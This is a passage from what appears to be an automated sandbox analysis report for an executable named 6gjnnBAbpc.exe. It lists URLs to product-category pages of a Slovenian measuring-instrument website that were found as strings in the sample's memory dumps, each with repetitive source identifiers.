00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/ir-termometri/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/merilnik-kvalitete-olja-
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-merilnik-vsebno
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-merilniki-ph/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-merilniki-prevo
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-termometri/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-vlagomerji-higr
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/razdelitev-po-industrijskih-sektorjih/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/razdelitev-po-industrijskih-sektorjih/data-logger
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/razdelitev-po-industrijskih-sektorjih/zivilska-in
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/livarski-termomete
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornik
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-seti
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/resitve-za-krusno-
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/tipala-za-meritve-
